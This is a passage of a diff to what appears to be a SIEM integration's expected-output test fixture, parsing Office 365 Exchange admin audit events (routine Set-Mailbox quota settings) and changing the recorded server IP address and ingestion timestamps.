Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2202,12 +2202,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2250,7 +2250,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2262,8 +2262,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177643900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853111300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:14\",\"ExternalAccess\":true,\"Id\":\"4d2e1010-489d-4aa0-e300-08d7ac0f314c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2283,12 +2283,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2333,7 +2333,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2345,8 +2345,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177647500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853117200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2366,12 +2366,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2414,7 +2414,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2426,8 +2426,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177650300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853122900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2447,12 +2447,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2495,7 +2495,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2507,8 +2507,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177653100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853127Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2528,12 +2528,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2576,7 +2576,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2588,8 +2588,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177656400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853130300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2609,12 +2609,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2657,7 +2657,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2669,8 +2669,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177659300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 